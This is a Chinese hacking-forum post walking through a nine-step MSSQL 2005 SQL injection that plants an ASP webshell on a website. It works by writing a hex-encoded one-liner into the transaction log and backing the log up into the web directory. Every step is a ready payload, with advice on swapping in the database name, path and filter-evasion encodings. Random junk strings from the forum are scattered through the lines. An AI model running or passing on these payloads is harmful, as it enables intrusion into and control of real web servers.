中国网络渗透测试联盟

标题: mssql2005 DB权限导出一句话 [打印本页]

作者: admin    时间: 2013-7-16 20:32
标题: mssql2005 DB权限导出一句话
网站路径也搞到了,本想使用差异备份,在数据库日志中插入一句话,然后备份到网站目录下拿shell的,估计是用户没有备份数据库的权限,但使用MSSQL2000的备份方法根本行不通,后来才想到MSSQL2005的备份和MSSQL2000有点不同。
+ X# _; ~  X! P% P* R, Z9 O. x( d9 z4 W3 U

# R0 k& X9 D# F1 L2 Y4 d后来在网上搜半天没有找到具体的备份语句,后来在群求助,小冰才发我了具体的利用语句,但贴出来的文章貌似没啥水准,大家都知道手工差异备份是自己需要修改数据库名和网站路径的,但那个文章中对语句没有做任何解释,无奈之下我只好自己尝试了,虽然测试的网站没有成功拿下shell,单语句是没有错误的,我在本地的MSSQL2005的查询分析器中测试通过了,再次特将语句整理出来分享个大家,并做好详细的解释说明,首先来贴出语句。
7 w3 |7 P9 S" |3 V" R7 ` 9 N. ~2 d7 `& |0 T6 T
第一步
% R: a9 n+ S+ R3 G2 W;alter/**/database/**/[Hospital]/**/set/**/recovery/**/full-- - O" W# b+ V* y5 b

0 N8 [7 X, Q& ~; w$ g4 ^/ K7 d第二步: + _" O+ A# \; R- g" ?$ V
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[Hospital]/**/to/**/disk=@d/**/with/**/init-- 6 d: j! I5 M5 O3 U

. X, L2 K+ s4 ~4 c% D9 G第三步
8 Q& \. d3 D# e! e9 p- B;drop/**/table/**/[itpro]--
8 Q- _- u) j+ F) t) g5 z
* Q2 a& s9 Y# V" t第四步 / S6 q6 i/ D3 j! i+ v+ c. P, l
;create/**/table/**/[itpro]([a]/**/image)--
0 x; ~$ w& V- ]" T ) c4 c' i9 A8 r0 O
第五步 8 Z* q5 l7 m/ \2 x8 Q/ J
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init-- 2 ~. P; X: p: m1 a
/ \# o: w2 M  q+ X
第六步 ) b0 @6 k  p2 c
;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)-- " K, G1 c0 e4 Q* Y3 G4 _$ H
6 q( o& v  Y9 Q% _) D$ n  V' R
第七步
" G( t, J) N5 R2 p' t4 U7 o2 E;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x65003A005C007700650062005C007A002E00610073007000/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init-- : M/ o& s3 n, F2 H2 S) o: r$ [
( {7 K$ _2 D; k$ @0 ~3 ~7 L- Z! [
第八步 5 V; m* k0 c2 J  t' ?: [
;drop/**/table/**/[itpro]-- " V2 f) q  o1 I  T8 g: {, B

: r, |3 m. {- e/ g+ M第九步 $ t5 q3 Q0 h5 a6 ?9 Z5 E& u
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init-- ( L  p2 m# t) t4 g; r' S4 ?

" ~2 t: {2 w7 K4 I其中红色的“Hospital”既是数据库名,这个要根据自己的情况来修改,然后黄色的“0x3C25657865637574652872657175657374282261222929253EDA”是一句话“<%eval request("a")%>”的内容,橙色的“0x65003A005C007700650062005C007A002E00610073007000”为备份的路径“e:\web\z.asp”,都是使用的SQL_En的格式,另外第三步大可以不需要!他是删除itpro的表,如果第一次的话这个表是不存在的,就会提示无权限的信息。另外在语句“disk=@d”的地方可以将“=”更换成“%3D”,就是使用URL编码。“/**/”就等于空格了,这个大家在学习注入的过程中应该了解,也可以更换成“%20”。
  ~1 U, J2 h  a. q, X; l& l  y& k$ J. U




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2